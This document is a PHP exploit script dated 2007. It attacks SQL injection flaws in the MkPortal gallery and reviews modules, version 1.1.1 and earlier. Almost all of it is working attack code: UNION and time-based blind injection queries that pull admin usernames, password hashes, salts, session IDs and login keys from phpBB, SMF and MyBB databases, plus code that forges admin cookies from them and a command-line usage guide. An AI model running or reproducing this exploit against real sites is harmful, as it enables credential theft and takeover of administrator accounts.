<?php /* [i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit [i] Vulnerable versions: MkPortal <= 1.1.1 [i] Bug discovered by: Coloss [i] Exploit by: Coloss [i] Date: 06.07.2007 [i] This is priv8 not for kids [Notes] At this time MkPortal 1.1.1 is the latest stable release Currently implemented: phpbb, smf and mybb */ $exptime = 3600; $stcnt = 300000; $maxnull = 5; $opts = getopt("u:U:P:f:m:d:o:"); $vars = array ( "phpbb", "1 UNION SELECT %s FROM phpbb_users WHERE user_id=2", "phpbb_sid", "1 UNION SELECT %s FROM phpbb_sessions WHERE session_user_id=2 ORDER BY descrizione DESC LIMIT 1", "smf", "1 UNION SELECT %s FROM smf_members WHERE ID_MEMBER=1", "mybb", "1 UNION SELECT %s FROM mybb_users WHERE uid=1", ); print "[i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit [i] Vulnerable versions: MkPortal <= 1.1.1 [i] Bug discovered by: Coloss [i] Exploit by: Coloss [i] Date: 06.07.2007 [i] This is priv8 not for kids "; if ($opts[u] == '') die(help($argv[0])); if (!strncmp($opts[u], "http", 4)) $url = $opts[u]; else $url = "http://".$opts[u]; if ($opts[U]) $user = $opts[U]; if ($opts[P]) $pass = $opts[P]; if ($opts[f]) $forum = $opts[f]; if ($opts[m]) $met = $opts[m]; if ($opts[o]) $file = $opts[o]; if ($opts[d]) $dir = $opts[d]; $cookies = ''; $delay = $min = $max = $mid = 0; $fld1 = $fld2 = ''; if (!$forum) die("[X] You haven't specified any forum type! "); echo "[+] Target: $url [$forum] "; exploit(); function exploit_gallery ($f) { global $cookies, $url, $fld1, $fld2; $sql = get_sql($f); $str = "NULL,".$fld1.",".$fld2.",NULL,NULL"; $req = sprintf($sql, $str); $u = $url."index.php?ind=gallery&op=edit_file&iden=".urlencode($req); $html = Send($u, NULL, $cookies); if (strstr($html, "ERROR: Database error")) die("[X] SQL Query Error.. probably wrong table prefix "); else if (strstr($html, "<title>Error</title>")) die("[X] This method failed. 
Try something else "); $var1 = get_string($html,"name="titolo" value="","""); $var2 = get_string($html,"name="descrizione" class="bgselect">","<"); return ($var1." ".$var2); } function get_delay ($cnt, $f, $u) { global $url, $cookies, $fld1, $fld2, $met; $sql = get_sql($f); if (strstr($met, "gallery")) $str = "NULL,".$fld1.",".$fld2.",NULL,NULL"; else $str = $fld1; $inj = sprintf($sql, $str); if (strstr($inj, "ORDER BY")) { list($base, $order) = explode("ORDER BY", $inj); $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,1,BENCHMARK(%d,MD5(31337))) ORDER BY". $order; } else $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,1,BENCHMARK(%d,MD5(31337)))"; $req = sprintf($inj, $fld1, 1, "=1", $cnt); $u .= urlencode($req); $start = getmicrotime(); Send($u, NULL, $cookies); $end = getmicrotime(); $delay = intval(10 * ($end - $start)); return $delay; } function get_normaldelay ($f, $u) { global $stcnt; $na = get_delay(1,$f,$u); $da = get_delay($stcnt,$f,$u); $nb = get_delay(1,$f,$u); $db = get_delay($stcnt,$f,$u); $nc = get_delay(1,$f,$u); $dc = get_delay($stcnt,$f,$u); $mean_delayed = intval(($da + $db + $dc) / 3); if ($mean_delayed < 2) die("Failed. The Answer was too rapid, probably you have not enough privileges "); return $mean_delayed; } function exploit_blind ($sql, $u, $field) { global $cookies, $stcnt, $delay, $min, $max, $mid; $cnt = $stcnt * 4; echo "[->] Trying to find value for '".$field."' "; for ($i = 1; $i < 51; $i++) { for ($j = $min; $j <= $max; $j++) { if ($j == $mid) $j = 97; $req = sprintf($sql, $field, $i, "=$j", $cnt); $ur = $u.urlencode($req); $start = getmicrotime(); Send($ur, NULL, $cookies); $end = getmicrotime(); $dtime = intval(10 * ($end - $start)); if ($dtime > ($delay * 2)) { $out .= chr($j); echo "[+] Current value for '".$field."' (".$i."): ".$out." "; break; } if ($j == $max) $i = 41; } } if ($out) echo " [->] Found value for '".$field."': ".$out." 
"; return $out; } function exploit_gallery_blind ($f) { global $fld1, $fld2, $url; $str = "NULL,".$fld1.",".$fld2.",NULL,NULL"; $sql = get_sql($f); $inj = sprintf($sql, $str); $u = $url."index.php?ind=gallery&op=edit_file&iden="; $var1 = exploit_init_blind($f, $u, $inj, $fld1); $var2 = exploit_init_blind($f, $u, $inj, $fld2); return ($var1." ".$var2); } function exploit_reviews ($f) { global $fld1, $fld2, $url; $u = $url."index.php?ind=reviews&op=update_file&iden="; $sql = get_sql($f); $inj = sprintf($sql, $fld1); $var1 = exploit_init_blind($f, $u, $inj, $fld1); $inj = sprintf($sql, $fld2); $var2 = exploit_init_blind($f, $u, $inj, $fld2); return ($var1." ".$var2); } function exploit_init_blind ($f, $u, $inj, $field) { global $cookies, $delay, $fld1, $fld2, $mid; if (strstr($inj, "ORDER BY")) { list($base, $order) = explode("ORDER BY", $inj); if ($mid == 58) $inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order; else $inj = $base."AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order; } else { if ($mid == 58) $inj .= " AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1)"; else $inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)"; } echo "[->] Starting blind sql injection! "; echo "[+] Getting standard response delay... "; $delay = get_normaldelay($f,$u); echo $delay."ds "; $var = exploit_blind($inj, $u, $field); if (strstr($f, "sid") && !$var) die("[X] Probably there are more sid in the table.. so we cannot fetch it.. retry later. 
"); return $var; } function get_data ($f) { global $met; switch ($met) { case 'reviews': $res = exploit_reviews($f); break; case 'gallery-blind': $res = exploit_gallery_blind($f); break; case 'gallery': $res = exploit_gallery($f); break; default: die("[X] Invalid exploit method specified "); } return $res; } function phpbb_exploit () { global $dir, $url, $user, $pass, $cookies, $forum, $exptime, $fld1, $fld2, $min, $max, $mid; if ($user && $pass) { echo "[+] Logging in... "; $u = $url.$dir."login.php?login=true"; $post = "username=".$user."&password=".$pass."&redirec=portalhome&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode(" ", $html); foreach($lines as $line) { if (strstr($line, "Set-Cookie") && strstr($line, "sid")) { $cookies = get_string($line, "Set-Cookie: ", ";"); $c++; } } if (!$cookies || $c < 2) die("Failed "); echo "Successfull "; } $fld1 = "username"; $fld2 = "user_password"; $min = 48; $max = 122; $mid = 58; $res = get_data($forum); list($auesr, $apwd) = explode(" ", $res); if ($auser && strlen($apwd) == 32) { owrite(" [+] Target: $url [$forum] "); owrite("[->] Found admin username: '".$auser."' "); owrite("[->] Found admin hash password: '".$apwd."' "); } else die("[X] Failed to retrive informations "); $fld1 = "session_id"; $fld2 = "session_time"; $max = 102; $res = get_data($forum."_sid"); list($sid,$start) = explode(" ", $res); if ($sid && strlen($sid) == 32) { $t = (int) (time() - $start - $exptime); if ($t >= 0) echo "[!] Found admin sid ('".$sid."') but it should not be valid anymore "; else owrite("[->] Found admin sid: '".$sid."' valid for ~".abs($t)."s "); } else echo "[!] No admin sid was found "; } function smf_exploit () { global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max; $base = 'a:4:{i:0;s:1:"1";i:1;s:40:"%s";i:2;i:1184000000;i:3;i:0;}'; if ($user && $pass) { echo "[+] Logging in... 
"; $u = $url.$dir."index.php?action=login2"; $post = "user=".$user."&passwrd=".$pass."&cookieneverexp=on&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode(" ", $html); foreach($lines as $line) { if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID")) $cookies = get_string($line, "Set-Cookie: ", ";"); } if (!$cookies) die("Failed "); echo "Successfull "; } $fld1 = "passwd"; $fld2 = "passwordSalt"; $min = 48; $max = 102; $mid = 58; $res = get_data($forum); list($pwd,$salt) = explode(" ", $res); if ($pwd && strlen($pwd) == 40 && strlen($salt) == 4) { $pass = $pwd.$salt; $pass = sha1($pass); $cookie = sprintf($base, $pass); list($cname) = explode("=", $cookies); owrite(" [+] Target: $url [$forum] "); owrite("[+] Found admin cookie '".$cname."': '".urlencode($cookie)."' "); } else die("[X] Failed to retrive informations "); } function mybb_exploit () { global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid; if ($user && $pass) { echo "[+] Logging in... 
"; $u = $url.$dir."member.php"; $post = "username=".$user."&password=".$pass."&action=do_login&submit=Login"; $html = Send($u, $post, NULL, TRUE); $lines = explode(" ", $html); foreach($lines as $line) { if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID") && !strstr($line, "[last") && !strstr($line, " sid=")) { $cookies = get_string($line, "Set-Cookie: ", ";"); } } if (!$cookies) die("Failed "); echo "Successfull "; } $fld1 = "loginkey"; $fld2 = "username"; $min = 48; $max = 122; $mid = 91; $res = get_data($forum); list($key,$auser) = explode(" ", $res); if ($key && strlen($key) == 50) { $cookie = sprintf($base, $pass); list($cname) = explode("=", $cookies); owrite(" [+] Target: $url [$forum] "); owrite("[+] Found admin cookie '".$cname."': '1_".$key."' "); } else die("[X] Failed to retrive informations "); $fld1 = "password"; $fld2 = "salt"; $res = get_data($forum); list($apwd,$salt) = explode(" ", $res); if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) { owrite("[+] Found admin hash password: '".$apwd."' "); owrite("[+] Found admin password salt: '".$salt."' "); } else echo "[!] No admin sid was found "; } function exploit () { global $forum; switch ($forum) { case 'phpbb': phpbb_exploit(); break; case 'smf': smf_exploit(); break; case 'mybb': mybb_exploit(); break; default: die("Failed. 
Cannot handle this type of forum "); } } function get_string ($str, $start, $end) { $res = substr($str, strpos($str, $start)+strlen($start),strpos(substr($str, strpos($str, $start)+strlen($start),strlen($str)), $end)); return $res; } function get_sql ($var) { global $vars; for ($i = 0, $j = 1; $vars[$i]; $i++, $j++) { if ($vars[$i] == $var) return $vars[$j]; } } function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } function Send($url, $post_fields='', $cookie = '', $headers = FALSE) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); if ($post_fields) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); } curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'); if(!empty($cookie)) curl_setopt ($ch, CURLOPT_COOKIE, $cookie); if($headers === TRUE) curl_setopt ($ch, CURLOPT_HEADER, TRUE); else curl_setopt ($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $fc = curl_exec($ch); curl_close($ch); return $fc; } function owrite ($msg) { global $file, $debug; echo $msg; if ($file) { if (!($h = fopen($file, 'ab')) && $debug) { echo "[X] Cannot open '$file' "; return; } if (fwrite($h, $msg) === FALSE && $debug) echo "[X] Cannot write to '$file' "; fclose($h); } } function help ($prog) { print "[-] Usage: $prog -u <url> -> Sets Target url [-U] <user> -> Your username [-P] <hash> -> Your password [-f] <type> -> Sets Forum type (phpbb, smf or mybb) [-m] <method> -> Which method do you want to use (gallery or reviews) [-d] <dir> -> Sets forum subdirectory [-o] <file> -> Writes results to a file "; } ?>